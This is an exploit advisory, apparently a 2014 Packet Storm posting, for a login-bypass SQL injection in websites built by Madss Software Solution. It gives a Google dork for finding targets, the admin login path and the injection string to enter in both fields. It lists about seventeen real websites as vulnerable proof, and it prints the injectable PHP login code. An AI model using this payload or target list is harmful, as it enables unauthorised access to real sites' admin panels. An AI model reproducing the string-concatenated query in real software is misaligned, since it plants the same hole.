what you don't know can hurt you

Madss Software Solution SQL Injection

Madss Software Solution SQL Injection
Posted Apr 13, 2014
Authored by Ashiyane Digital Security Team

Sites developed by Madss Software Solution suffer from a SQL injection vulnerability that allows for login bypass.

tags | exploit, sql injection
MD5 | 15217ca0a7d266590949b9bbb6407ae9

Madss Software Solution SQL Injection

Change Mirror Download
#########################################
# Exploit Title : Developed by Madss Software Solution Login page Bypass Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://madsssoftwaresolution.com
#
# Tested on: Windows 7 , Linux
#
# Google Dork : intext:"Developed by Madss Software Solution Pvt. Ltd."
#
# Date: 2014/4/13
#
###########################################
#
# Exploit : Login page bypass
#
# Location : [Target]/admin/login.php
#
# Username : '=' 'or'
#
# Password : '=' 'or'
######################
# Proof:
#
# http://www.artistmahendradubey.com/admin/login.php
#
# http://www.sardarenterprises.com/admin/login.php
#
# http://www.amritaorganic.com/admin/login.php
#
# http://www.kvmcpandhana.com/admin/login.php
#
# http://www.vikatsoft.com/admin/login.php
#
# http://www.narulamathsmagic.com/admin/login.php
#
# http://www.dayodayathirthborgaon.com/admin/login.php
#
# http://www.chhatimata.com/admin/login.php
#
# http://www.chhatimata.com/admin/login.php
#
# http://www.mnlawcollegekhandwa.com/admin/login.php
#
# http://www.guptashrikhandwa.com/admin/login.php
#
# http://www.apnagwalior.com/admin/login.php
#
# http://www.apnamorena.com/admin/login.php
#
# http://www.djpsbhikangaon.com/admin/login.php
#
# http://www.acmecoachingbhikangaon.com/admin/login.php
#
# http://www.sainisportsacademy.com/admin/login.php
#
# http://www.apnaburhanpur.com/admin/login.php
#
############################################

Vulnerable Code

<?php
session_start();
error_reporting(0);
include("config.php");

/*if(isset($_SESSION["session_nickname"]) && $_SESSION["session_nickname"]!="")
{
header("location:admin_home.php");
}*/
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Admin Login</title>
<link href="css/login.css" rel="stylesheet" type="text/css" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head>
<body>
<br />

<a href="../xlexcicalx.php" style="margin-left:850px; color:#F00">Logout completelly</a>
<div id="logincontainer">
<h1>Administrator</h1>
<div id="loginbox">
<?php
if(isset($_POST['submit']))
{
$sql=mysql_query("select * from tbl_admin where username='".$_POST['username']."' and password='".$_POST['password']."' and type='admin'") or die(mysql_error());

if(mysql_num_rows($sql)>0)
{
$_SESSION["session_nickname"]=$_POST['username'];
$_SESSION["type"]='admin';
?>

<script type="text/javascript"> window.location.href="admin_home.php";</script>
<?php
}
else
{
$mass="Invalid user name or password. ";
}

?>
<tr>
<td colspan="3" align="center"><strong style="color:#FF0000"><?php echo $mass; ?></strong></td>
</tr>
<?php
}
?>
<form method="post" />
<div class="inputcontainer">
<img src="./images/icons/icon_username.png" alt="Username" />
<label for="username">Username:</label>
<input type="text" id="username" name="username" />
</div>
<div class="inputcontainer">
<img src="./images/icons/icon_locked.png" alt="Password" />
<label for="password">Password:</label>
<input type="password" id="password" name="password" />
</div>
<input type="submit" name="submit" value="Login" class="loginsubmit" />
<p><a href="forget_password.php">Forgotten password</a></p>
</form>
</div>
</div>
</body>
</html>

###################################################

Milad Hacking

We Love Mohammad

Home Page : https://www.facebook.com/milad.hacking.5
Email: milad.hacking.blackhat[at]gmail.com

Parcham balast

############################################
Special Tnx To

My Love , Iliya Norton , Unfix Blackhat , HashoR , Unline , mahdi.safavi , h00man_empire
Bahman Spy , Far Yar , Parsix , Matthew Farrell , ALi Sec , Ali Svr , Hossein Ghayoumi Zadeh , Shahram BlackHat , Saeed Nouri Massal , Hamid Reza Ashrafnia , LinX64 , Hossein Hezami , Raminramz ,Ali Reza , Saeed.0511 , Spoofer ( best Friend ) , Dr4GOn ,Alireza666 , Amirh03in , Rezahck23 , EB051 , AbolfazlKHAAN , Hacker.Ramin , b0z0rgmehr , badguy , Nc 521 , Alireza Attacker , HAMIDx9 , GNU Linux , BlackhatGH , Angel--D3m0n , B14ckc0d3r , Milad-Bushehr , F.I.G.H.T.E.R , SHD.N3T , SaiedSoft , Cyb3r_Inj3ct0r , SolD!3r , ACC3SS , Wanted2011 , CyberHacker , Hasan Speed , iman teymouri , Ba3bak , spoof , T3rm!nat0r5 , D3s!6n37 , @_HOJ@T_@ , 4rm4n , Th€ mAnger , FaridP30 , AMoK , Azad™ , The-Smith , soheil-hidd3n , blackvirus73 ,ERroR , HASSAN20 , Majidflash , R33VES™ , Rz04 , stealer , Dr.James , m@rte2a , Mast3r 0mid , MMA Defacer , MR.Moein , Mr.PERSIA , Red line
############################################
Never Forget My Top Friends <3
############################################

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close